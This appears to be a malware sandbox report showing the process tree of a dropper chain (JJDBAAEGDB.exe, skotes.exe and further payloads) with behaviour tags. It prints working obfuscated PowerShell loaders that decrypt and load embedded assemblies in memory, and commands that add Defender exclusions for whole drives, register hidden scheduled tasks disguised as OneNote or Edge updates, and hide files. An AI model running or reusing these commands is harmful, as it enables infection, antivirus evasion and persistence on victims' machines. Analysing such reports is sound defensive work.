    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7fffff5246f8,0x7fffff524708,0x7fffff524718
    3⤵
    - Checks processor information in registry
    - Enumerates system info in registry
    - Suspicious behavior: EnumeratesProcesses
    PID:5064
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2080,17723771672541608781,7191712824652499358,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2092 /prefetch:2
    3⤵
    PID:1304
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2080,17723771672541608781,7191712824652499358,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2480 /prefetch:3
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:3644
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2080,17723771672541608781,7191712824652499358,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2644 /prefetch:8
    3⤵
    PID:552
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9229 --field-trial-handle=2080,17723771672541608781,7191712824652499358,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3376 /prefetch:1
    3⤵
    - Uses browser remote debugging
    PID:1284
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9229 --field-trial-handle=2080,17723771672541608781,7191712824652499358,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3392 /prefetch:1
    3⤵
    - Uses browser remote debugging
    PID:4700
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9229 --field-trial-handle=2080,17723771672541608781,7191712824652499358,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4588 /prefetch:1
    3⤵
    - Uses browser remote debugging
    PID:1080
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9229 --field-trial-handle=2080,17723771672541608781,7191712824652499358,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3992 /prefetch:1
    3⤵
    - Uses browser remote debugging
    PID:4432
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\Admin\Documents\JJDBAAEGDB.exe"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:4180
- - C:\Users\Admin\Documents\JJDBAAEGDB.exe
    "C:\Users\Admin\Documents\JJDBAAEGDB.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Checks computer location settings
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Drops file in Windows directory
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    PID:4268
  - - C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
      "C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"
      4⤵
      Identifies VirtualBox via ACPI registry values (likely anti-VM)
      Checks BIOS information in registry
      Checks computer location settings
      Executes dropped EXE
      Identifies Wine through registry keys
      Suspicious use of NtSetInformationThreadHideFromDebugger
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      PID:972
    - - C:\Users\Admin\AppData\Local\Temp\1011316001\DU1zDwm.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1011316001\DU1zDwm.exe"
        5⤵
        Executes dropped EXE
        
        PID:4560
      - C:\Windows\SYSTEM32\attrib.exe
        
        attrib +H +S C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe
        6⤵
        Views/modifies file attributes
        
        PID:1180
      - C:\Windows\SYSTEM32\attrib.exe
        
        attrib +H C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe
        6⤵
        Views/modifies file attributes
        
        PID:1784
      - C:\Windows\SYSTEM32\schtasks.exe
        
        schtasks /f /CREATE /TN "MicrosoftEdgeUpdateTaskMachineCoreSC" /TR "C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe" /SC MINUTE
        6⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:3296
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell ping 127.0.0.1; del DU1zDwm.exe
        6⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2884
        
        C:\Windows\system32\PING.EXE
        
        "C:\Windows\system32\PING.EXE" 127.0.0.1
        7⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:1424
    - - C:\Users\Admin\AppData\Local\Temp\1011373001\stories.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1011373001\stories.exe"
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:4980
      - C:\Users\Admin\AppData\Local\Temp\is-66C8N.tmp\stories.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-66C8N.tmp\stories.tmp" /SL5="$C0092,3557056,54272,C:\Users\Admin\AppData\Local\Temp\1011373001\stories.exe"
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of FindShellTrayWindow
        
        PID:2880
        
        C:\Windows\SysWOW64\net.exe
        
        "C:\Windows\system32\net.exe" pause video_jet_1233
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:3192
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 pause video_jet_1233
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:4808
        
        C:\Users\Admin\AppData\Local\VideoJet 5.1.3.55\videojet32.exe
        
        "C:\Users\Admin\AppData\Local\VideoJet 5.1.3.55\videojet32.exe" -i
        7⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:876
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\1011428021\withroot.cmd" "
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2344
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Local\Temp\1011428021\withroot.cmd';$dDiO='LRynPoadRynP'.Replace('RynP', ''),'SpaoCflitaoCf'.Replace('aoCf', ''),'CpVXarepVXaapVXateDpVXaepVXacrpVXayppVXatpVXaorpVXa'.Replace('pVXa', ''),'ChsohbansohbgeEsohbxtsohbensohbssohbisohbosohbnsohb'.Replace('sohb', ''),'CopmwsyyTomwsy'.Replace('mwsy', ''),'RjwWteajwWtdLjwWtinjwWtesjwWt'.Replace('jwWt', ''),'FroxuoEmxuoEBasxuoEe6xuoE4StxuoErixuoEngxuoE'.Replace('xuoE', ''),'InwozUvowozUkwozUewozU'.Replace('wozU', ''),'GVJeMeVJeMtCVJeMurVJeMrVJeMentVJeMProVJeMceVJeMsVJeMsVJeM'.Replace('VJeM', ''),'ElkXvnemekXvnntkXvnAkXvntkXvn'.Replace('kXvn', ''),'EntMmVmryPMmVmoiMmVmntMmVm'.Replace('MmVm', ''),'TUudXranUudXsfUudXorUudXmFiUudXnaUudXlBlUudXocUudXkUudX'.Replace('UudX', ''),'MayhiDinMyhiDoyhiDduyhiDleyhiD'.Replace('yhiD', ''),'DejLwccojLwcmpjLwcresjLwcsjLwc'.Replace('jLwc', '');powershell -w hidden;$modules=[System.Diagnostics.Process]::($dDiO[8])().Modules;if ($modules -match 'hmpalert.dll') { exit; };function yLwIh($TZhDQ){$YZolA=[System.Security.Cryptography.Aes]::Create();$YZolA.Mode=[System.Security.Cryptography.CipherMode]::CBC;$YZolA.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$YZolA.Key=[System.Convert]::($dDiO[6])('duQk/QtsCXjlfUWS6XCUuCu5I1g6+OrVeXJ2aigXvB8=');$YZolA.IV=[System.Convert]::($dDiO[6])('9XjdTIP29vRyU5L9wYwsyw==');$BZniG=$YZolA.($dDiO[2])();$mkKMG=$BZniG.($dDiO[11])($TZhDQ,0,$TZhDQ.Length);$BZniG.Dispose();$YZolA.Dispose();$mkKMG;}function XFQUx($TZhDQ){$WCDIU=New-Object System.IO.MemoryStream(,$TZhDQ);$NUdnb=New-Object System.IO.MemoryStream;$TtrMr=New-Object System.IO.Compression.GZipStream($WCDIU,[IO.Compression.CompressionMode]::($dDiO[13]));$TtrMr.($dDiO[4])($NUdnb);$TtrMr.Dispose();$WCDIU.Dispose();$NUdnb.Dispose();$NUdnb.ToArray();}$wHJim=[System.IO.File]::($dDiO[5])([Console]::Title);$kvBry=XFQUx (yLwIh ([Convert]::($dDiO[6])([System.Linq.Enumerable]::($dDiO[9])($wHJim, 5).Substring(2))));$hsQZC=XFQUx (yLwIh ([Convert]::($dDiO[6])([System.Linq.Enumerable]::($dDiO[9])($wHJim, 6).Substring(2))));[System.Reflection.Assembly]::($dDiO[0])([byte[]]$hsQZC).($dDiO[10]).($dDiO[7])($null,$null);[System.Reflection.Assembly]::($dDiO[0])([byte[]]$kvBry).($dDiO[10]).($dDiO[7])($null,$null); "
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:1144
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        6⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1704
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
        7⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1620
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" add-mppreference -exclusionpath @('C:\','D:\','F:\')
        7⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4696
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Local\Temp\1011428021\withroot')
        7⤵
        
        PID:2280
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneNote 25450' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Network25450Man.cmd') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
        7⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3296
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c start "" "C:\Users\Admin\AppData\Roaming\Network25450Man.cmd"
        7⤵
        
        PID:760
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Roaming\Network25450Man.cmd"
        8⤵
        
        PID:3824
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Roaming\Network25450Man.cmd';$dDiO='LRynPoadRynP'.Replace('RynP', ''),'SpaoCflitaoCf'.Replace('aoCf', ''),'CpVXarepVXaapVXateDpVXaepVXacrpVXayppVXatpVXaorpVXa'.Replace('pVXa', ''),'ChsohbansohbgeEsohbxtsohbensohbssohbisohbosohbnsohb'.Replace('sohb', ''),'CopmwsyyTomwsy'.Replace('mwsy', ''),'RjwWteajwWtdLjwWtinjwWtesjwWt'.Replace('jwWt', ''),'FroxuoEmxuoEBasxuoEe6xuoE4StxuoErixuoEngxuoE'.Replace('xuoE', ''),'InwozUvowozUkwozUewozU'.Replace('wozU', ''),'GVJeMeVJeMtCVJeMurVJeMrVJeMentVJeMProVJeMceVJeMsVJeMsVJeM'.Replace('VJeM', ''),'ElkXvnemekXvnntkXvnAkXvntkXvn'.Replace('kXvn', ''),'EntMmVmryPMmVmoiMmVmntMmVm'.Replace('MmVm', ''),'TUudXranUudXsfUudXorUudXmFiUudXnaUudXlBlUudXocUudXkUudX'.Replace('UudX', ''),'MayhiDinMyhiDoyhiDduyhiDleyhiD'.Replace('yhiD', ''),'DejLwccojLwcmpjLwcresjLwcsjLwc'.Replace('jLwc', '');powershell -w hidden;$modules=[System.Diagnostics.Process]::($dDiO[8])().Modules;if ($modules -match 'hmpalert.dll') { exit; };function yLwIh($TZhDQ){$YZolA=[System.Security.Cryptography.Aes]::Create();$YZolA.Mode=[System.Security.Cryptography.CipherMode]::CBC;$YZolA.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$YZolA.Key=[System.Convert]::($dDiO[6])('duQk/QtsCXjlfUWS6XCUuCu5I1g6+OrVeXJ2aigXvB8=');$YZolA.IV=[System.Convert]::($dDiO[6])('9XjdTIP29vRyU5L9wYwsyw==');$BZniG=$YZolA.($dDiO[2])();$mkKMG=$BZniG.($dDiO[11])($TZhDQ,0,$TZhDQ.Length);$BZniG.Dispose();$YZolA.Dispose();$mkKMG;}function XFQUx($TZhDQ){$WCDIU=New-Object System.IO.MemoryStream(,$TZhDQ);$NUdnb=New-Object System.IO.MemoryStream;$TtrMr=New-Object System.IO.Compression.GZipStream($WCDIU,[IO.Compression.CompressionMode]::($dDiO[13]));$TtrMr.($dDiO[4])($NUdnb);$TtrMr.Dispose();$WCDIU.Dispose();$NUdnb.Dispose();$NUdnb.ToArray();}$wHJim=[System.IO.File]::($dDiO[5])([Console]::Title);$kvBry=XFQUx (yLwIh ([Convert]::($dDiO[6])([System.Linq.Enumerable]::($dDiO[9])($wHJim, 5).Substring(2))));$hsQZC=XFQUx (yLwIh ([Convert]::($dDiO[6])([System.Linq.Enumerable]::($dDiO[9])($wHJim, 6).Substring(2))));[System.Reflection.Assembly]::($dDiO[0])([byte[]]$hsQZC).($dDiO[10]).($dDiO[7])($null,$null);[System.Reflection.Assembly]::($dDiO[0])([byte[]]$kvBry).($dDiO[10]).($dDiO[7])($null,$null); "
        9⤵
        
        PID:3024
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        9⤵
        
        PID:3284
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
        10⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1512
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" add-mppreference -exclusionpath @('C:\','D:\','F:\')
        10⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2324
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Roaming\Network25450Man')
        10⤵
        
        PID:4400
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneNote 25450' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Network25450Man.cmd') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
        10⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4496
        
        C:\Windows\SysWOW64\wermgr.exe
        
        "C:\Windows\system32\wermgr.exe" "-outproc" "0" "4496" "2560" "2452" "2564" "0" "0" "2596" "0" "0" "0" "0" "0"
        11⤵
        
        PID:228
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\10002870121\lowsigmbye.cmd" "
        10⤵
        
        PID:1652
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Local\Temp\10002870121\lowsigmbye.cmd';$Zuin='LohLgJadhLgJ'.Replace('hLgJ', ''),'SpUdGHlitUdGH'.Replace('UdGH', ''),'CkzbKhankzbKgekzbKExkzbKtenkzbKskzbKikzbKokzbKnkzbK'.Replace('kzbK', ''),'TraXqevnsXqevforXqevmXqevFXqevinXqevalBXqevloXqevckXqev'.Replace('Xqev', ''),'CreIZJaatIZJaeIZJaDeIZJacIZJarIZJaypIZJatoIZJarIZJa'.Replace('IZJa', ''),'FrlsceomlsceBlscealsceslscee6lsce4Slscetrlsceinlsceglsce'.Replace('lsce', ''),'EnPCOltrPCOlyPoPCOlinPCOltPCOl'.Replace('PCOl', ''),'ElluGUemeluGUnluGUtluGUAtluGU'.Replace('luGU', ''),'CowSLIpyTwSLIowSLI'.Replace('wSLI', ''),'DQNkhecQNkhompQNkhrQNkheQNkhssQNkh'.Replace('QNkh', ''),'ReBEWfaBEWfdBEWfLBEWfineBEWfsBEWf'.Replace('BEWf', ''),'GetQshGCQshGurQshGreQshGnQshGtQshGPrQshGoQshGcQshGessQshG'.Replace('QshG', ''),'MahQKVinhQKVMhQKVohQKVduhQKVlehQKV'.Replace('hQKV', ''),'Invdqdfokdqdfedqdf'.Replace('dqdf', '');powershell -w hidden;$modules=[System.Diagnostics.Process]::($Zuin[11])().Modules;if ($modules -match 'hmpalert.dll') { exit; };function zvObs($JvbIA){$BTsJb=[System.Security.Cryptography.Aes]::Create();$BTsJb.Mode=[System.Security.Cryptography.CipherMode]::CBC;$BTsJb.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$BTsJb.Key=[System.Convert]::($Zuin[5])('KwI+m+CS1RDGlA9XTP7AS8wYXfFUGAPj9L5At8f7F1s=');$BTsJb.IV=[System.Convert]::($Zuin[5])('l/MlylluBYy9Hd3APLUJJw==');$WXMvq=$BTsJb.($Zuin[4])();$uocwr=$WXMvq.($Zuin[3])($JvbIA,0,$JvbIA.Length);$WXMvq.Dispose();$BTsJb.Dispose();$uocwr;}function YULgT($JvbIA){$JsFWY=New-Object System.IO.MemoryStream(,$JvbIA);$KRoOX=New-Object System.IO.MemoryStream;$WGloZ=New-Object System.IO.Compression.GZipStream($JsFWY,[IO.Compression.CompressionMode]::($Zuin[9]));$WGloZ.($Zuin[8])($KRoOX);$WGloZ.Dispose();$JsFWY.Dispose();$KRoOX.Dispose();$KRoOX.ToArray();}$WMVlw=[System.IO.File]::($Zuin[10])([Console]::Title);$wetuz=YULgT (zvObs ([Convert]::($Zuin[5])([System.Linq.Enumerable]::($Zuin[7])($WMVlw, 5).Substring(2))));$oCIEk=YULgT (zvObs ([Convert]::($Zuin[5])([System.Linq.Enumerable]::($Zuin[7])($WMVlw, 6).Substring(2))));[System.Reflection.Assembly]::($Zuin[0])([byte[]]$oCIEk).($Zuin[6]).($Zuin[13])($null,$null);[System.Reflection.Assembly]::($Zuin[0])([byte[]]$wetuz).($Zuin[6]).($Zuin[13])($null,$null); "
        11⤵
        
        PID:5420
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        11⤵
        
        PID:5848
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
        12⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5828
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" add-mppreference -exclusionpath @('C:\','D:\','F:\')
        12⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4328
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Local\Temp\10002870121\lowsigmbye')
        12⤵
        
        PID:4040
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneNote 80302' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Network80302Man.cmd') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
        12⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2328
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c start "" "C:\Users\Admin\AppData\Roaming\Network80302Man.cmd"
        12⤵
        
        PID:2456
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Roaming\Network80302Man.cmd"
        13⤵
        
        PID:4464
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Roaming\Network80302Man.cmd';$Zuin='LohLgJadhLgJ'.Replace('hLgJ', ''),'SpUdGHlitUdGH'.Replace('UdGH', ''),'CkzbKhankzbKgekzbKExkzbKtenkzbKskzbKikzbKokzbKnkzbK'.Replace('kzbK', ''),'TraXqevnsXqevforXqevmXqevFXqevinXqevalBXqevloXqevckXqev'.Replace('Xqev', ''),'CreIZJaatIZJaeIZJaDeIZJacIZJarIZJaypIZJatoIZJarIZJa'.Replace('IZJa', ''),'FrlsceomlsceBlscealsceslscee6lsce4Slscetrlsceinlsceglsce'.Replace('lsce', ''),'EnPCOltrPCOlyPoPCOlinPCOltPCOl'.Replace('PCOl', ''),'ElluGUemeluGUnluGUtluGUAtluGU'.Replace('luGU', ''),'CowSLIpyTwSLIowSLI'.Replace('wSLI', ''),'DQNkhecQNkhompQNkhrQNkheQNkhssQNkh'.Replace('QNkh', ''),'ReBEWfaBEWfdBEWfLBEWfineBEWfsBEWf'.Replace('BEWf', ''),'GetQshGCQshGurQshGreQshGnQshGtQshGPrQshGoQshGcQshGessQshG'.Replace('QshG', ''),'MahQKVinhQKVMhQKVohQKVduhQKVlehQKV'.Replace('hQKV', ''),'Invdqdfokdqdfedqdf'.Replace('dqdf', '');powershell -w hidden;$modules=[System.Diagnostics.Process]::($Zuin[11])().Modules;if ($modules -match 'hmpalert.dll') { exit; };function zvObs($JvbIA){$BTsJb=[System.Security.Cryptography.Aes]::Create();$BTsJb.Mode=[System.Security.Cryptography.CipherMode]::CBC;$BTsJb.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$BTsJb.Key=[System.Convert]::($Zuin[5])('KwI+m+CS1RDGlA9XTP7AS8wYXfFUGAPj9L5At8f7F1s=');$BTsJb.IV=[System.Convert]::($Zuin[5])('l/MlylluBYy9Hd3APLUJJw==');$WXMvq=$BTsJb.($Zuin[4])();$uocwr=$WXMvq.($Zuin[3])($JvbIA,0,$JvbIA.Length);$WXMvq.Dispose();$BTsJb.Dispose();$uocwr;}function YULgT($JvbIA){$JsFWY=New-Object System.IO.MemoryStream(,$JvbIA);$KRoOX=New-Object System.IO.MemoryStream;$WGloZ=New-Object System.IO.Compression.GZipStream($JsFWY,[IO.Compression.CompressionMode]::($Zuin[9]));$WGloZ.($Zuin[8])($KRoOX);$WGloZ.Dispose();$JsFWY.Dispose();$KRoOX.Dispose();$KRoOX.ToArray();}$WMVlw=[System.IO.File]::($Zuin[10])([Console]::Title);$wetuz=YULgT (zvObs ([Convert]::($Zuin[5])([System.Linq.Enumerable]::($Zuin[7])($WMVlw, 5).Substring(2))));$oCIEk=YULgT (zvObs ([Convert]::($Zuin[5])([System.Linq.Enumerable]::($Zuin[7])($WMVlw, 6).Substring(2))));[System.Reflection.Assembly]::($Zuin[0])([byte[]]$oCIEk).($Zuin[6]).($Zuin[13])($null,$null);[System.Reflection.Assembly]::($Zuin[0])([byte[]]$wetuz).($Zuin[6]).($Zuin[13])($null,$null); "
        14⤵
        
        PID:5804
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        14⤵
        
        PID:3876
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
        15⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4924
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" add-mppreference -exclusionpath @('C:\','D:\','F:\')
        15⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3200
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Roaming\Network80302Man')
        15⤵
        
        PID:4456
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneNote 80302' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Network80302Man.cmd') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
        15⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4024
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3876 -s 2420
        15⤵
        Program crash
        
        PID:6036
    - - C:\Users\Admin\AppData\Local\Temp\1011445001\rhnew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1011445001\rhnew.exe"
        5⤵
        Suspicious use of NtCreateUserProcessOtherParentProcess
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:3628
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3628 -s 540
        6⤵
        Program crash
        
        PID:1568
